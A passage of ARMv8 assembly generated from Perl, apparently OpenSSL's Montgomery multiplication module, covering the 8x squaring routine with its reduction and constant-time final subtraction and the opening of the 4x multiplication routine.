mul $t2,$a6,$a5 // lo(a[6..7]*a[5]) (vi)
adc $acc4,xzr,xzr // t[12]
adds $acc2,$acc2,$t3
mul $t3,$a7,$a5
adcs $acc3,$acc3,$t0
umulh $t0,$a6,$a5 // hi(a[6..7]*a[5])
adc $acc4,$acc4,$t1
umulh $t1,$a7,$a5
adds $acc3,$acc3,$t2
mul $t2,$a7,$a6 // lo(a[7]*a[6]) (vii)
adcs $acc4,$acc4,$t3
umulh $t3,$a7,$a6 // hi(a[7]*a[6])
adc $acc5,xzr,xzr // t[13]
adds $acc4,$acc4,$t0
sub $cnt,$ap_end,$ap // done yet?
adc $acc5,$acc5,$t1
adds $acc5,$acc5,$t2
sub $t0,$ap_end,$num // rewinded ap
adc $acc6,xzr,xzr // t[14]
add $acc6,$acc6,$t3
cbz $cnt,.Lsqr8x_outer_break
mov $n0,$a0
ldp $a0,$a1,[$tp,#8*0]
ldp $a2,$a3,[$tp,#8*2]
ldp $a4,$a5,[$tp,#8*4]
ldp $a6,$a7,[$tp,#8*6]
adds $acc0,$acc0,$a0
adcs $acc1,$acc1,$a1
ldp $a0,$a1,[$ap,#8*0]
adcs $acc2,$acc2,$a2
adcs $acc3,$acc3,$a3
ldp $a2,$a3,[$ap,#8*2]
adcs $acc4,$acc4,$a4
adcs $acc5,$acc5,$a5
ldp $a4,$a5,[$ap,#8*4]
adcs $acc6,$acc6,$a6
mov $rp,$ap
adcs $acc7,xzr,$a7
ldp $a6,$a7,[$ap,#8*6]
add $ap,$ap,#8*8
//adc $carry,xzr,xzr // moved below
mov $cnt,#-8*8
// a[8]a[0]
// a[9]a[0]
// a[a]a[0]
// a[b]a[0]
// a[c]a[0]
// a[d]a[0]
// a[e]a[0]
// a[f]a[0]
// a[8]a[1]
// a[f]a[1]........................
// a[8]a[2]
// a[f]a[2]........................
// a[8]a[3]
// a[f]a[3]........................
// a[8]a[4]
// a[f]a[4]........................
// a[8]a[5]
// a[f]a[5]........................
// a[8]a[6]
// a[f]a[6]........................
// a[8]a[7]
// a[f]a[7]........................
.Lsqr8x_mul:
mul $t0,$a0,$n0
adc $carry,xzr,xzr // carry bit, modulo-scheduled
mul $t1,$a1,$n0
add $cnt,$cnt,#8
mul $t2,$a2,$n0
mul $t3,$a3,$n0
adds $acc0,$acc0,$t0
mul $t0,$a4,$n0
adcs $acc1,$acc1,$t1
mul $t1,$a5,$n0
adcs $acc2,$acc2,$t2
mul $t2,$a6,$n0
adcs $acc3,$acc3,$t3
mul $t3,$a7,$n0
adcs $acc4,$acc4,$t0
umulh $t0,$a0,$n0
adcs $acc5,$acc5,$t1
umulh $t1,$a1,$n0
adcs $acc6,$acc6,$t2
umulh $t2,$a2,$n0
adcs $acc7,$acc7,$t3
umulh $t3,$a3,$n0
adc $carry,$carry,xzr
str $acc0,[$tp],#8
adds $acc0,$acc1,$t0
umulh $t0,$a4,$n0
adcs $acc1,$acc2,$t1
umulh $t1,$a5,$n0
adcs $acc2,$acc3,$t2
umulh $t2,$a6,$n0
adcs $acc3,$acc4,$t3
umulh $t3,$a7,$n0
ldr $n0,[$rp,$cnt]
adcs $acc4,$acc5,$t0
adcs $acc5,$acc6,$t1
adcs $acc6,$acc7,$t2
adcs $acc7,$carry,$t3
//adc $carry,xzr,xzr // moved above
cbnz $cnt,.Lsqr8x_mul
// note that carry flag is guaranteed
// to be zero at this point
cmp $ap,$ap_end // done yet?
b.eq .Lsqr8x_break
ldp $a0,$a1,[$tp,#8*0]
ldp $a2,$a3,[$tp,#8*2]
ldp $a4,$a5,[$tp,#8*4]
ldp $a6,$a7,[$tp,#8*6]
adds $acc0,$acc0,$a0
ldur $n0,[$rp,#-8*8]
adcs $acc1,$acc1,$a1
ldp $a0,$a1,[$ap,#8*0]
adcs $acc2,$acc2,$a2
adcs $acc3,$acc3,$a3
ldp $a2,$a3,[$ap,#8*2]
adcs $acc4,$acc4,$a4
adcs $acc5,$acc5,$a5
ldp $a4,$a5,[$ap,#8*4]
adcs $acc6,$acc6,$a6
mov $cnt,#-8*8
adcs $acc7,$acc7,$a7
ldp $a6,$a7,[$ap,#8*6]
add $ap,$ap,#8*8
//adc $carry,xzr,xzr // moved above
b .Lsqr8x_mul
.align 4
.Lsqr8x_break:
ldp $a0,$a1,[$rp,#8*0]
add $ap,$rp,#8*8
ldp $a2,$a3,[$rp,#8*2]
sub $t0,$ap_end,$ap // is it last iteration?
ldp $a4,$a5,[$rp,#8*4]
sub $t1,$tp,$t0
ldp $a6,$a7,[$rp,#8*6]
cbz $t0,.Lsqr8x_outer_loop
stp $acc0,$acc1,[$tp,#8*0]
ldp $acc0,$acc1,[$t1,#8*0]
stp $acc2,$acc3,[$tp,#8*2]
ldp $acc2,$acc3,[$t1,#8*2]
stp $acc4,$acc5,[$tp,#8*4]
ldp $acc4,$acc5,[$t1,#8*4]
stp $acc6,$acc7,[$tp,#8*6]
mov $tp,$t1
ldp $acc6,$acc7,[$t1,#8*6]
b .Lsqr8x_outer_loop
.align 4
.Lsqr8x_outer_break:
// Now multiply above result by 2 and add a[n-1]*a[n-1]|...|a[0]*a[0]
ldp $a1,$a3,[$t0,#8*0] // recall that $t0 is &a[0]
ldp $t1,$t2,[sp,#8*1]
ldp $a5,$a7,[$t0,#8*2]
add $ap,$t0,#8*4
ldp $t3,$t0,[sp,#8*3]
stp $acc0,$acc1,[$tp,#8*0]
mul $acc0,$a1,$a1
stp $acc2,$acc3,[$tp,#8*2]
umulh $a1,$a1,$a1
stp $acc4,$acc5,[$tp,#8*4]
mul $a2,$a3,$a3
stp $acc6,$acc7,[$tp,#8*6]
mov $tp,sp
umulh $a3,$a3,$a3
adds $acc1,$a1,$t1,lsl#1
extr $t1,$t2,$t1,#63
sub $cnt,$num,#8*4
.Lsqr4x_shift_n_add:
adcs $acc2,$a2,$t1
extr $t2,$t3,$t2,#63
sub $cnt,$cnt,#8*4
adcs $acc3,$a3,$t2
ldp $t1,$t2,[$tp,#8*5]
mul $a4,$a5,$a5
ldp $a1,$a3,[$ap],#8*2
umulh $a5,$a5,$a5
mul $a6,$a7,$a7
umulh $a7,$a7,$a7
extr $t3,$t0,$t3,#63
stp $acc0,$acc1,[$tp,#8*0]
adcs $acc4,$a4,$t3
extr $t0,$t1,$t0,#63
stp $acc2,$acc3,[$tp,#8*2]
adcs $acc5,$a5,$t0
ldp $t3,$t0,[$tp,#8*7]
extr $t1,$t2,$t1,#63
adcs $acc6,$a6,$t1
extr $t2,$t3,$t2,#63
adcs $acc7,$a7,$t2
ldp $t1,$t2,[$tp,#8*9]
mul $a0,$a1,$a1
ldp $a5,$a7,[$ap],#8*2
umulh $a1,$a1,$a1
mul $a2,$a3,$a3
umulh $a3,$a3,$a3
stp $acc4,$acc5,[$tp,#8*4]
extr $t3,$t0,$t3,#63
stp $acc6,$acc7,[$tp,#8*6]
add $tp,$tp,#8*8
adcs $acc0,$a0,$t3
extr $t0,$t1,$t0,#63
adcs $acc1,$a1,$t0
ldp $t3,$t0,[$tp,#8*3]
extr $t1,$t2,$t1,#63
cbnz $cnt,.Lsqr4x_shift_n_add
___
my ($np,$np_end)=($ap,$ap_end);
$code.=<<___;
ldp $np,$n0,[x29,#104] // pull np and n0
adcs $acc2,$a2,$t1
extr $t2,$t3,$t2,#63
adcs $acc3,$a3,$t2
ldp $t1,$t2,[$tp,#8*5]
mul $a4,$a5,$a5
umulh $a5,$a5,$a5
stp $acc0,$acc1,[$tp,#8*0]
mul $a6,$a7,$a7
umulh $a7,$a7,$a7
stp $acc2,$acc3,[$tp,#8*2]
extr $t3,$t0,$t3,#63
adcs $acc4,$a4,$t3
extr $t0,$t1,$t0,#63
ldp $acc0,$acc1,[sp,#8*0]
adcs $acc5,$a5,$t0
extr $t1,$t2,$t1,#63
ldp $a0,$a1,[$np,#8*0]
adcs $acc6,$a6,$t1
extr $t2,xzr,$t2,#63
ldp $a2,$a3,[$np,#8*2]
adc $acc7,$a7,$t2
ldp $a4,$a5,[$np,#8*4]
// Reduce by 512 bits per iteration
mul $na0,$n0,$acc0 // t[0]*n0
ldp $a6,$a7,[$np,#8*6]
add $np_end,$np,$num
ldp $acc2,$acc3,[sp,#8*2]
stp $acc4,$acc5,[$tp,#8*4]
ldp $acc4,$acc5,[sp,#8*4]
stp $acc6,$acc7,[$tp,#8*6]
ldp $acc6,$acc7,[sp,#8*6]
add $np,$np,#8*8
mov $topmost,xzr // initial top-most carry
mov $tp,sp
mov $cnt,#8
.Lsqr8x_reduction:
// (*) mul $t0,$a0,$na0 // lo(n[0-7])*lo(t[0]*n0)
mul $t1,$a1,$na0
sub $cnt,$cnt,#1
mul $t2,$a2,$na0
str $na0,[$tp],#8 // put aside t[0]*n0 for tail processing
mul $t3,$a3,$na0
// (*) adds xzr,$acc0,$t0
subs xzr,$acc0,#1 // (*)
mul $t0,$a4,$na0
adcs $acc0,$acc1,$t1
mul $t1,$a5,$na0
adcs $acc1,$acc2,$t2
mul $t2,$a6,$na0
adcs $acc2,$acc3,$t3
mul $t3,$a7,$na0
adcs $acc3,$acc4,$t0
umulh $t0,$a0,$na0 // hi(n[0-7])*lo(t[0]*n0)
adcs $acc4,$acc5,$t1
umulh $t1,$a1,$na0
adcs $acc5,$acc6,$t2
umulh $t2,$a2,$na0
adcs $acc6,$acc7,$t3
umulh $t3,$a3,$na0
adc $acc7,xzr,xzr
adds $acc0,$acc0,$t0
umulh $t0,$a4,$na0
adcs $acc1,$acc1,$t1
umulh $t1,$a5,$na0
adcs $acc2,$acc2,$t2
umulh $t2,$a6,$na0
adcs $acc3,$acc3,$t3
umulh $t3,$a7,$na0
mul $na0,$n0,$acc0 // next t[0]*n0
adcs $acc4,$acc4,$t0
adcs $acc5,$acc5,$t1
adcs $acc6,$acc6,$t2
adc $acc7,$acc7,$t3
cbnz $cnt,.Lsqr8x_reduction
ldp $t0,$t1,[$tp,#8*0]
ldp $t2,$t3,[$tp,#8*2]
mov $rp,$tp
sub $cnt,$np_end,$np // done yet?
adds $acc0,$acc0,$t0
adcs $acc1,$acc1,$t1
ldp $t0,$t1,[$tp,#8*4]
adcs $acc2,$acc2,$t2
adcs $acc3,$acc3,$t3
ldp $t2,$t3,[$tp,#8*6]
adcs $acc4,$acc4,$t0
adcs $acc5,$acc5,$t1
adcs $acc6,$acc6,$t2
adcs $acc7,$acc7,$t3
//adc $carry,xzr,xzr // moved below
cbz $cnt,.Lsqr8x8_post_condition
ldur $n0,[$tp,#-8*8]
ldp $a0,$a1,[$np,#8*0]
ldp $a2,$a3,[$np,#8*2]
ldp $a4,$a5,[$np,#8*4]
mov $cnt,#-8*8
ldp $a6,$a7,[$np,#8*6]
add $np,$np,#8*8
.Lsqr8x_tail:
mul $t0,$a0,$n0
adc $carry,xzr,xzr // carry bit, modulo-scheduled
mul $t1,$a1,$n0
add $cnt,$cnt,#8
mul $t2,$a2,$n0
mul $t3,$a3,$n0
adds $acc0,$acc0,$t0
mul $t0,$a4,$n0
adcs $acc1,$acc1,$t1
mul $t1,$a5,$n0
adcs $acc2,$acc2,$t2
mul $t2,$a6,$n0
adcs $acc3,$acc3,$t3
mul $t3,$a7,$n0
adcs $acc4,$acc4,$t0
umulh $t0,$a0,$n0
adcs $acc5,$acc5,$t1
umulh $t1,$a1,$n0
adcs $acc6,$acc6,$t2
umulh $t2,$a2,$n0
adcs $acc7,$acc7,$t3
umulh $t3,$a3,$n0
adc $carry,$carry,xzr
str $acc0,[$tp],#8
adds $acc0,$acc1,$t0
umulh $t0,$a4,$n0
adcs $acc1,$acc2,$t1
umulh $t1,$a5,$n0
adcs $acc2,$acc3,$t2
umulh $t2,$a6,$n0
adcs $acc3,$acc4,$t3
umulh $t3,$a7,$n0
ldr $n0,[$rp,$cnt]
adcs $acc4,$acc5,$t0
adcs $acc5,$acc6,$t1
adcs $acc6,$acc7,$t2
adcs $acc7,$carry,$t3
//adc $carry,xzr,xzr // moved above
cbnz $cnt,.Lsqr8x_tail
// note that carry flag is guaranteed
// to be zero at this point
ldp $a0,$a1,[$tp,#8*0]
sub $cnt,$np_end,$np // done yet?
sub $t2,$np_end,$num // rewinded np
ldp $a2,$a3,[$tp,#8*2]
ldp $a4,$a5,[$tp,#8*4]
ldp $a6,$a7,[$tp,#8*6]
cbz $cnt,.Lsqr8x_tail_break
ldur $n0,[$rp,#-8*8]
adds $acc0,$acc0,$a0
adcs $acc1,$acc1,$a1
ldp $a0,$a1,[$np,#8*0]
adcs $acc2,$acc2,$a2
adcs $acc3,$acc3,$a3
ldp $a2,$a3,[$np,#8*2]
adcs $acc4,$acc4,$a4
adcs $acc5,$acc5,$a5
ldp $a4,$a5,[$np,#8*4]
adcs $acc6,$acc6,$a6
mov $cnt,#-8*8
adcs $acc7,$acc7,$a7
ldp $a6,$a7,[$np,#8*6]
add $np,$np,#8*8
//adc $carry,xzr,xzr // moved above
b .Lsqr8x_tail
.align 4
.Lsqr8x_tail_break:
ldr $n0,[x29,#112] // pull n0
add $cnt,$tp,#8*8 // end of current t[num] window
subs xzr,$topmost,#1 // "move" top-most carry to carry bit
adcs $t0,$acc0,$a0
adcs $t1,$acc1,$a1
ldp $acc0,$acc1,[$rp,#8*0]
adcs $acc2,$acc2,$a2
ldp $a0,$a1,[$t2,#8*0] // recall that $t2 is &n[0]
adcs $acc3,$acc3,$a3
ldp $a2,$a3,[$t2,#8*2]
adcs $acc4,$acc4,$a4
adcs $acc5,$acc5,$a5
ldp $a4,$a5,[$t2,#8*4]
adcs $acc6,$acc6,$a6
adcs $acc7,$acc7,$a7
ldp $a6,$a7,[$t2,#8*6]
add $np,$t2,#8*8
adc $topmost,xzr,xzr // top-most carry
mul $na0,$n0,$acc0
stp $t0,$t1,[$tp,#8*0]
stp $acc2,$acc3,[$tp,#8*2]
ldp $acc2,$acc3,[$rp,#8*2]
stp $acc4,$acc5,[$tp,#8*4]
ldp $acc4,$acc5,[$rp,#8*4]
cmp $cnt,x29 // did we hit the bottom?
stp $acc6,$acc7,[$tp,#8*6]
mov $tp,$rp // slide the window
ldp $acc6,$acc7,[$rp,#8*6]
mov $cnt,#8
b.ne .Lsqr8x_reduction
// Final step. We see if result is larger than modulus, and
// if it is, subtract the modulus. But comparison implies
// subtraction. So we subtract modulus, see if it borrowed,
// and conditionally copy original value.
ldr $rp,[x29,#96] // pull rp
add $tp,$tp,#8*8
subs $t0,$acc0,$a0
sbcs $t1,$acc1,$a1
sub $cnt,$num,#8*8
mov $ap_end,$rp // $rp copy
.Lsqr8x_sub:
sbcs $t2,$acc2,$a2
ldp $a0,$a1,[$np,#8*0]
sbcs $t3,$acc3,$a3
stp $t0,$t1,[$rp,#8*0]
sbcs $t0,$acc4,$a4
ldp $a2,$a3,[$np,#8*2]
sbcs $t1,$acc5,$a5
stp $t2,$t3,[$rp,#8*2]
sbcs $t2,$acc6,$a6
ldp $a4,$a5,[$np,#8*4]
sbcs $t3,$acc7,$a7
ldp $a6,$a7,[$np,#8*6]
add $np,$np,#8*8
ldp $acc0,$acc1,[$tp,#8*0]
sub $cnt,$cnt,#8*8
ldp $acc2,$acc3,[$tp,#8*2]
ldp $acc4,$acc5,[$tp,#8*4]
ldp $acc6,$acc7,[$tp,#8*6]
add $tp,$tp,#8*8
stp $t0,$t1,[$rp,#8*4]
sbcs $t0,$acc0,$a0
stp $t2,$t3,[$rp,#8*6]
add $rp,$rp,#8*8
sbcs $t1,$acc1,$a1
cbnz $cnt,.Lsqr8x_sub
sbcs $t2,$acc2,$a2
mov $tp,sp
add $ap,sp,$num
ldp $a0,$a1,[$ap_end,#8*0]
sbcs $t3,$acc3,$a3
stp $t0,$t1,[$rp,#8*0]
sbcs $t0,$acc4,$a4
ldp $a2,$a3,[$ap_end,#8*2]
sbcs $t1,$acc5,$a5
stp $t2,$t3,[$rp,#8*2]
sbcs $t2,$acc6,$a6
ldp $acc0,$acc1,[$ap,#8*0]
sbcs $t3,$acc7,$a7
ldp $acc2,$acc3,[$ap,#8*2]
sbcs xzr,$topmost,xzr // did it borrow?
ldr x30,[x29,#8] // pull return address
stp $t0,$t1,[$rp,#8*4]
stp $t2,$t3,[$rp,#8*6]
sub $cnt,$num,#8*4
.Lsqr4x_cond_copy:
sub $cnt,$cnt,#8*4
csel $t0,$acc0,$a0,lo
stp xzr,xzr,[$tp,#8*0]
csel $t1,$acc1,$a1,lo
ldp $a0,$a1,[$ap_end,#8*4]
ldp $acc0,$acc1,[$ap,#8*4]
csel $t2,$acc2,$a2,lo
stp xzr,xzr,[$tp,#8*2]
add $tp,$tp,#8*4
csel $t3,$acc3,$a3,lo
ldp $a2,$a3,[$ap_end,#8*6]
ldp $acc2,$acc3,[$ap,#8*6]
add $ap,$ap,#8*4
stp $t0,$t1,[$ap_end,#8*0]
stp $t2,$t3,[$ap_end,#8*2]
add $ap_end,$ap_end,#8*4
stp xzr,xzr,[$ap,#8*0]
stp xzr,xzr,[$ap,#8*2]
cbnz $cnt,.Lsqr4x_cond_copy
csel $t0,$acc0,$a0,lo
stp xzr,xzr,[$tp,#8*0]
csel $t1,$acc1,$a1,lo
stp xzr,xzr,[$tp,#8*2]
csel $t2,$acc2,$a2,lo
csel $t3,$acc3,$a3,lo
stp $t0,$t1,[$ap_end,#8*0]
stp $t2,$t3,[$ap_end,#8*2]
b .Lsqr8x_done
.align 4
.Lsqr8x8_post_condition:
adc $carry,xzr,xzr
ldr x30,[x29,#8] // pull return address
// $acc0-7,$carry hold result, $a0-7 hold modulus
subs $a0,$acc0,$a0
ldr $ap,[x29,#96] // pull rp
sbcs $a1,$acc1,$a1
stp xzr,xzr,[sp,#8*0]
sbcs $a2,$acc2,$a2
stp xzr,xzr,[sp,#8*2]
sbcs $a3,$acc3,$a3
stp xzr,xzr,[sp,#8*4]
sbcs $a4,$acc4,$a4
stp xzr,xzr,[sp,#8*6]
sbcs $a5,$acc5,$a5
stp xzr,xzr,[sp,#8*8]
sbcs $a6,$acc6,$a6
stp xzr,xzr,[sp,#8*10]
sbcs $a7,$acc7,$a7
stp xzr,xzr,[sp,#8*12]
sbcs $carry,$carry,xzr // did it borrow?
stp xzr,xzr,[sp,#8*14]
// $a0-7 hold result-modulus
csel $a0,$acc0,$a0,lo
csel $a1,$acc1,$a1,lo
csel $a2,$acc2,$a2,lo
csel $a3,$acc3,$a3,lo
stp $a0,$a1,[$ap,#8*0]
csel $a4,$acc4,$a4,lo
csel $a5,$acc5,$a5,lo
stp $a2,$a3,[$ap,#8*2]
csel $a6,$acc6,$a6,lo
csel $a7,$acc7,$a7,lo
stp $a4,$a5,[$ap,#8*4]
stp $a6,$a7,[$ap,#8*6]
.Lsqr8x_done:
ldp x19,x20,[x29,#16]
mov sp,x29
ldp x21,x22,[x29,#32]
mov x0,#1
ldp x23,x24,[x29,#48]
ldp x25,x26,[x29,#64]
ldp x27,x28,[x29,#80]
ldr x29,[sp],#128
.inst 0xd50323bf // autiasp
ret
.size __bn_sqr8x_mont,.-__bn_sqr8x_mont
___
}
{
########################################################################
# Even though this might look as ARMv8 adaptation of mulx4x_mont from
# x86_64-mont5 module, it's different in sense that it performs
# reduction 256 bits at a time.
my ($a0,$a1,$a2,$a3,
$t0,$t1,$t2,$t3,
$m0,$m1,$m2,$m3,
$acc0,$acc1,$acc2,$acc3,$acc4,
$bi,$mi,$tp,$ap_end,$cnt) = map("x$_",(6..17,19..28));
my $bp_end=$rp;
my ($carry,$topmost) = ($rp,"x30");
$code.=<<___;
.type __bn_mul4x_mont,%function
.align 5
__bn_mul4x_mont:
.inst 0xd503233f // paciasp
stp x29,x30,[sp,#-128]!
add x29,sp,#0
stp x19,x20,[sp,#16]
stp x21,x22,[sp,#32]
stp x23,x24,[sp,#48]
stp x25,x26,[sp,#64]
stp x27,x28,[sp,#80]
sub $tp,sp,$num,lsl#3
lsl $num,$num,#3
ldr $n0,[$n0] // *n0
sub sp,$tp,#8*4 // alloca
add $t0,$bp,$num
add $ap_end,$ap,$num
stp $rp,$t0,[x29,#96] // offload rp and &b[num]
ldr $bi,[$bp,#8*0] // b[0]
ldp $a0,$a1,[$ap,#8*0] // a[0..3]
ldp $a2,$a3,[$ap,#8*2]
add $ap,$ap,#8*4
mov $acc0,xzr
mov $acc1,xzr
mov $acc2,xzr
mov $acc3,xzr
ldp $m0,$m1,[$np,#8*0] // n[0..3]
ldp $m2,$m3,[$np,#8*2]
adds $np,$np,#8*4 // clear carry bit
mov $carry,xzr
mov $cnt,#0
mov $tp,sp
.Loop_mul4x_1st_reduction:
mul $t0,$a0,$bi // lo(a[0..3]*b[0])
adc $carry,$carry,xzr // modulo-scheduled
mul $t1,$a1,$bi
add $cnt,$cnt,#8
mul $t2,$a2,$bi
and $cnt,$cnt,#31
mul $t3,$a3,$bi
adds $acc0,$acc0,$t0
umulh $t0,$a0,$bi // hi(a[0..3]*b[0])
adcs $acc1,$acc1,$t1
mul $mi,$acc0,$n0 // t[0]*n0
adcs $acc2,$acc2,$t2
umulh $t1,$a1,$bi
adcs $acc3,$acc3,$t3
umulh $t2,$a2,$bi
adc $acc4,xzr,xzr
umulh $t3,$a3,$bi
ldr $bi,[$bp,$cnt] // next b[i] (or b[0])
adds $acc1,$acc1,$t0
// (*) mul $t0,$m0,$mi // lo(n[0..3]*t[0]*n0)
str $mi,[$tp],#8 // put aside t[0]*n0 for tail processing
adcs $acc2,$acc2,$t1
mul $t1,$m1,$mi
adcs $acc3,$acc3,$t2
mul $t2,$m2,$mi
adc $acc4,$acc4,$t3 // can't overflow
mul $t3,$m3,$mi
// (*) adds xzr,$acc0,$t0
subs xzr,$acc0,#1 // (*)
umulh $t0,$m0,$mi // hi(n[0..3]*t[0]*n0)
adcs $acc0,$acc1,$t1
umulh $t1,$m1,$mi
adcs $acc1,$acc2,$t2
umulh $t2,$m2,$mi
adcs $acc2,$acc3,$t3
umulh $t3,$m3,$mi
adcs $acc3,$acc4,$carry
adc $carry,xzr,xzr
adds $acc0,$acc0,$t0
sub $t0,$ap_end,$ap
adcs $acc1,$acc1,$t1
adcs $acc2,$acc2,$t2
adcs $acc3,$acc3,$t3
//adc $carry,$carry,xzr
cbnz $cnt,.Loop_mul4x_1st_reduction
cbz $t0,.Lmul4x4_post_condition
ldp $a0,$a1,[$ap,#8*0] // a[4..7]
ldp $a2,$a3,[$ap,#8*2]
add $ap,$ap,#8*4
ldr $mi,[sp] // a[0]*n0
ldp $m0,$m1,[$np,#8*0] // n[4..7]
ldp $m2,$m3,[$np,#8*2]
add $np,$np,#8*4
.Loop_mul4x_1st_tail:
mul $t0,$a0,$bi // lo(a[4..7]*b[i])
adc $carry,$carry,xzr // modulo-scheduled
mul $t1,$a1,$bi
add $cnt,$cnt,#8
mul $t2,$a2,$bi
and $cnt,$cnt,#31
mul $t3,$a3,$bi
adds $acc0,$acc0,$t0
umulh $t0,$a0,$bi // hi(a[4..7]*b[i])
adcs $acc1,$acc1,$t1
umulh $t1,$a1,$bi
adcs $acc2,$acc2,$t2
umulh $t2,$a2,$bi
adcs $acc3,$acc3,$t3
umulh $t3,$a3,$bi
adc $acc4,xzr,xzr
ldr $bi,[$bp,$cnt] // next b[i] (or b[0])
adds $acc1,$acc1,$t0
mul $t0,$m0,$mi // lo(n[4..7]*a[0]*n0)
adcs $acc2,$acc2,$t1
mul $t1,$m1,$mi
adcs $acc3,$acc3,$t2
mul $t2,$m2,$mi
adc $acc4,$acc4,$t3 // can't overflow
mul $t3,$m3,$mi
adds $acc0,$acc0,$t0
umulh $t0,$m0,$mi // hi(n[4..7]*a[0]*n0)
adcs $acc1,$acc1,$t1
umulh $t1,$m1,$mi
adcs $acc2,$acc2,$t2
umulh $t2,$m2,$mi
adcs $acc3,$acc3,$t3
adcs $acc4,$acc4,$carry
umulh $t3,$m3,$mi
adc $carry,xzr,xzr
ldr $mi,[sp,$cnt] // next t[0]*n0
str $acc0,[$tp],#8 // result!!!
adds $acc0,$acc1,$t0
sub $t0,$ap_end,$ap // done yet?
adcs $acc1,$acc2,$t1
adcs $acc2,$acc3,$t2
adcs $acc3,$acc4,$t3
//adc $carry,$carry,xzr
cbnz $cnt,.Loop_mul4x_1st_tail
sub $t1,$ap_end,$num // rewinded $ap
cbz $t0,.Lmul4x_proceed
ldp $a0,$a1,[$ap,#8*0]
ldp $a2,$a3,[$ap,#8*2]
add $ap,$ap,#8*4
ldp $m0,$m1,[$np,#8*0]
ldp $m2,$m3,[$np,#8*2]
add $np,$np,#8*4
b .Loop_mul4x_1st_tail
.align 5
.Lmul4x_proceed:
ldr $bi,[$bp,#8*4]! // *++b
adc $topmost,$carry,xzr
ldp $a0,$a1,[$t1,#8*0] // a[0..3]
sub $np,$np,$num // rewind np
ldp $a2,$a3,[$t1,#8*2]
add $ap,$t1,#8*4
stp $acc0,$acc1,[$tp,#8*0] // result!!!
ldp $acc0,$acc1,[sp,#8*4] // t[0..3]
stp $acc2,$acc3,[$tp,#8*2] // result!!!
ldp $acc2,$acc3,[sp,#8*6]
ldp $m0,$m1,[$np,#8*0] // n[0..3]
mov $tp,sp
ldp $m2,$m3,[$np,#8*2]
adds $np,$np,#8*4 // clear carry bit
mov $carry,xzr
.align 4
.Loop_mul4x_reduction:
mul $t0,$a0,$bi // lo(a[0..3]*b[4])
adc $carry,$carry,xzr // modulo-scheduled
mul $t1,$a1,$bi
add $cnt,$cnt,#8
mul $t2,$a2,$bi
and $cnt,$cnt,#31
mul $t3,$a3,$bi
adds $acc0,$acc0,$t0
umulh $t0,$a0,$bi // hi(a[0..3]*b[4])
adcs $acc1,$acc1,$t1
mul $mi,$acc0,$n0 // t[0]*n0
adcs $acc2,$acc2,$t2
umulh $t1,$a1,$bi
adcs $acc3,$acc3,$t3
umulh $t2,$a2,$bi
adc $acc4,xzr,xzr
umulh $t3,$a3,$bi
ldr $bi,[$bp,$cnt] // next b[i]
adds $acc1,$acc1,$t0
// (*) mul $t0,$m0,$mi
str $mi,[$tp],#8 // put aside t[0]*n0 for tail processing
adcs $acc2,$acc2,$t1
mul $t1,$m1,$mi // lo(n[0..3]*t[0]*n0
adcs $acc3,$acc3,$t2
mul $t2,$m2,$mi
adc $acc4,$acc4,$t3 // can't overflow
mul $t3,$m3,$mi
// (*) adds xzr,$acc0,$t0
subs xzr,$acc0,#1 // (*)
umulh $t0,$m0,$mi // hi(n[0..3]*t[0]*n0
adcs $acc0,$acc1,$t1
umulh $t1,$m1,$mi
adcs $acc1,$acc2,$t2
umulh $t2,$m2,$mi
adcs $acc2,$acc3,$t3
umulh $t3,$m3,$mi
adcs $acc3,$acc4,$carry
adc $carry,xzr,xzr
adds $acc0,$acc0,$t0
adcs $acc1,$acc1,$t1
adcs $acc2,$acc2,$t2
adcs $acc3,$acc3,$t3
//adc $carry,$carry,xzr
cbnz $cnt,.Loop_mul4x_reduction
adc $carry,$carry,xzr
ldp $t0,$t1,[$tp,#8*4] // t[4..7]
ldp $t2,$t3,[$tp,#8*6]
ldp $a0,$a1,[$ap,#8*0] // a[4..7]
ldp $a2,$a3,[$ap,#8*2]
add $ap,$ap,#8*4
adds $acc0,$acc0,$t0
adcs $acc1,$acc1,$t1
adcs $acc2,$acc2,$t2
adcs $acc3,$acc3,$t3
//adc $carry,$carry,xzr
ldr $mi,[sp] // t[0]*n0
ldp $m0,$m1,[$np,#8*0] // n[4..7]
ldp $m2,$m3,[$np,#8*2]
add $np,$np,#8*4
.align 4
.Loop_mul4x_tail:
mul $t0,$a0,$bi // lo(a[4..7]*b[4])
adc $carry,$carry,xzr // modulo-scheduled
mul $t1,$a1,$bi
add $cnt,$cnt,#8
mul $t2,$a2,$bi
and $cnt,$cnt,#31
mul $t3,$a3,$bi
adds $acc0,$acc0,$t0
umulh $t0,$a0,$bi // hi(a[4..7]*b[4])
adcs $acc1,$acc1,$t1
umulh $t1,$a1,$bi
adcs $acc2,$acc2,$t2
umulh $t2,$a2,$bi
adcs $acc3,$acc3,$t3
umulh $t3,$a3,$bi
adc $acc4,xzr,xzr
ldr $bi,[$bp,$cnt] // next b[i]
adds $acc1,$acc1,$t0
mul $t0,$m0,$mi // lo(n[4..7]*t[0]*n0)
adcs $acc2,$acc2,$t1
mul $t1,$m1,$mi
adcs $acc3,$acc3,$t2
mul $t2,$m2,$mi
adc $acc4,$acc4,$t3 // can't overflow
mul $t3,$m3,$mi
adds $acc0,$acc0,$t0
umulh $t0,$m0,$mi // hi(n[4..7]*t[0]*n0)
adcs $acc1,$acc1,$t1
umulh $t1,$m1,$mi
adcs $acc2,$acc2,$t2
umulh $t2,$m2,$mi
adcs $acc3,$acc3,$t3
umulh $t3,$m3,$mi
adcs $acc4,$acc4,$carry
ldr $mi,[sp,$cnt] // next a[0]*n0
adc $carry,xzr,xzr
str $acc0,[$tp],#8 // result!!!
adds $acc0,$acc1,$t0
sub $t0,$ap_end,$ap // done yet?
adcs $acc1,$acc2,$t1
adcs $acc2,$acc3,$t2
adcs $acc3,$acc4,$t3
//adc $carry,$carry,xzr
cbnz $cnt,.Loop_mul4x_tail
sub $t1,$np,$num // rewinded np?
adc $carry,$carry,xzr
cbz $t0,.Loop_mul4x_break
ldp $t0,$t1,[$tp,#8*4]
ldp $t2,$t3,[$tp,#8*6]
ldp $a0,$a1,[$ap,#8*0]
ldp $a2,$a3,[$ap,#8*2]
add $ap,$ap,#8*4
adds $acc0,$acc0,$t0
adcs $acc1,$acc1,$t1
adcs $acc2,$acc2,$t2
adcs $acc3,$acc3,$t3
//adc $carry,$carry,xzr
ldp $m0,$m1,[$np,#8*0]
ldp $m2,$m3,[$np,#8*2]
add $np,$np,#8*4
b .Loop_mul4x_tail
.align 4
.Loop_mul4x_break:
ldp $t2,$t3,[x29,#96] // pull rp and &b[num]
adds $acc0,$acc0,$topmost
add $bp,$bp,#8*4 // bp++
